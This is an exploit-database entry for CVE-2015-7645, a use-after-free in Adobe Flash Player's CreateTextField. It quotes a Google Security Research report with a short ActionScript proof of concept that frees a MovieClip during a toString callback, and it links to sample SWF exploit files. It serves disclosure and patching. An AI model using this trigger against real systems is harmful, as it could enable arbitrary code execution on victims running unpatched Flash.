header-logo
Suggest Exploit
vendor:
Flash Player
by:
Google Security Research
9.3
CVSS
HIGH
Use-after-free
416
CWE
Product Name: Flash Player
Affected Version From: Adobe Flash Player 18.0.0.194 and earlier
Affected Version To: Adobe Flash Player 18.0.0.203 and earlier
Patch Exists: YES
Related CWE: CVE-2015-7645
CPE: o:adobe:flash_player
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2015

Use-after-free in CreateTextField

A use-after-free vulnerability exists in Adobe Flash Player due to a flaw when CreateTextField is called on a MovieClip heirarcy. If a call is made into a function that deletes the MovieClip, a use-after-free occurs. This can be exploited to execute arbitrary code by tricking a user into opening a specially crafted SWF file.

Mitigation:

Upgrade to the latest version of Adobe Flash Player.
Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:

_root-->l1-->l2-->l3

If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:

var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);

function strfunc(){
	
	l2.removeMovieClip();
	return "myname";
	
	}

A sample SWF and fla are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip